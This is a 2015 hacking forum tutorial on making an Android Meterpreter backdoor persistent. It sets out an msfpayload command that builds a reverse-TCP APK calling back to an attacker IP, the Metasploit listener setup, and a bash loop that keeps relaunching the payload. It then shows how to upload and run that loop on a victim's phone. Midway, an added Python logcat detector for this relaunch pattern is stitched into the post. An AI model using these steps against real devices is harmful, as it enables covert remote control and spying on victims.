How to Create a Persistent Back Door in Android Using Kali Linux

Apr 8, 2015 03:47 PM
Sep 8, 2015 08:25 AM

OR rather How to make the Backdoor Persistent:

Hello, my Cold and Merciless Hackers,

Welcome to my 5th Post,

In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.

I finally found a way to do this. As I was/am very poor at bash scripting, it took me a long time (approx. 20 hrs) to get the script working and executable, thanks to the raw syntax I found on other sites.

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.

I'll be hacking on WAN, using a VM.

  • Let's create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
  • Now, let's set up a listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)

--------------------------------------------------------------------------------------------------------

#!/bin/bash

while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done

--------------------------------------------------------------------------------------------------------

(Don't copy the "-----" lines. Also, there is no line break between the 3rd and the 4th line; they are a single line.)

(The first line, #!/bin/bash, is also important, as it identifies the script as a bash shell script.)

(You can set the sleep to any amount of seconds you want the script to sleep)


Move/Copy this to the Home/Root folder of KALI.

--------------------------------------------------------------------------------------------------------

Updated Script v3 (Compatible with any android version)

CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT MAY NOT WORK /!\

..I guess, you will have to write it on your own.. (Don't ask me why..)

Code:

--------------------------------------------------------------------------------------------------------

#!/bin/bash

while :

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done

--------------------------------------------------------------------------------------------------------

There is a 'space' between 'while' and ':'

NO Multiple spaces in the script.

NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!

To do this, navigate to the directory using the following commands:

  • cd /

Now you should be in the ROOT directory, you can check by typing:

  • ls

Now type:

  • cd etc

Check again by typing:

  • ls

Again change directory:

  • cd init.d
  • ls

Here we are...

Time to Upload the Shell Script:

Do this by typing:

  • upload anything.sh

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Let's just make the application (i.e. Main Activity) persistent until Reboot

> However, it will not be persistent after the android system on the Victim goes for a Reboot.

> To do this upload the script anywhere in the sdcard:

  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh

Done! Uploaded!

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.

Drop into the system's shell by typing:

  • shell

Now, navigate to the location of the script:

  • cd /
  • cd /sdcard/Download
  • ls

Now it's time for EXECUTION. Type:

  • sh anything.sh

The script has been activated! All you have to do is press Ctrl+C to terminate the shell. (Don't worry, the script is still running.)

Reboot to eliminate the script or use Task Killer
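
Seen from the defender's side, the loop above leaves a recognisable trace: the same activity component is started at a near-constant interval. The following is an added example, not part of the original post, that flags that pattern in logcat output. The threadtime line layout, the thresholds and the sample lines (including the second package, PIDs and uid values) are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed layout: logcat -v threadtime, "MM-DD HH:MM:SS.mmm PID TID L Tag: msg".
START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+\d+\s+\d+\s+\w\s+"
    r"Activity(?:Task)?Manager: START u\d+ \{.*?cmp=([\w.]+/[\w.$]+)"
)

def find_periodic_relaunches(lines, min_starts=4, max_jitter=2.0, max_period=300.0):
    """Return {component: mean gap in seconds} for activities started on a timer."""
    starts = defaultdict(list)
    for line in lines:
        m = START_RE.match(line)
        if m:
            # logcat omits the year; prepend a fixed leap year so any date parses.
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    flagged = {}
    for component, stamps in starts.items():
        if len(stamps) < min_starts:
            continue  # too few launches to call it a pattern
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # A person opening an app gives irregular gaps; a sleep loop does not.
        if mean(gaps) <= max_period and pstdev(gaps) <= max_jitter:
            flagged[component] = round(mean(gaps), 1)
    return flagged

# Constructed sample: one component relaunched about every 20 s, one opened by hand.
SAMPLE_LOG = """\
04-08 15:40:01.120   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10087
04-08 15:40:05.044   812   901 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Home} from uid 10021
04-08 15:40:21.310   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10087
04-08 15:40:41.275   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10087
04-08 15:40:50.500   812   901 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Home} from uid 10021
04-08 15:41:01.402   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10087
04-08 15:41:21.388   812   830 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10087
04-08 15:43:10.010   812   901 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Home} from uid 10021
04-08 15:43:12.730   812   901 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.notes/.Home} from uid 10021
""".splitlines()

if __name__ == "__main__":
    for comp, gap in find_periodic_relaunches(SAMPLE_LOG).items():
        print(f"periodic relaunch: {comp} about every {gap} s")
```

On a device under investigation, the input would be the output of `adb logcat -d -v threadtime`, split into lines.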

Step 5: Testing...

You can test it by exiting from meterpreter and again setting up a Listener.

You should get a meterpreter prompt automatically!

PROOF:

[screenshot]

Wow! It happened so Fast that 3 sessions got opened one after another.

(I know that the above picture shows that I am hacking on LAN instead of WAN, as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed it on LAN, BUT no worries, I have tested it on WAN, works fine.)

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

  • The persistence of the backdoor will only remain until a reboot of the android system.
  • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
  • Remember to reboot the Android device to eliminate the running script if you are testing on your own Android system.
  • If the Victim's Android system is Rooted and your Public IP is Static, then:

    1) The persistence will remain forever on WAN!

    2) The persistence will remain forever on LAN, obviously.

Good-Bye Hackers!

Keep Coming For More!

I'll be waiting for Your Likes and Comments,

Thank You,

F.E.A.R.
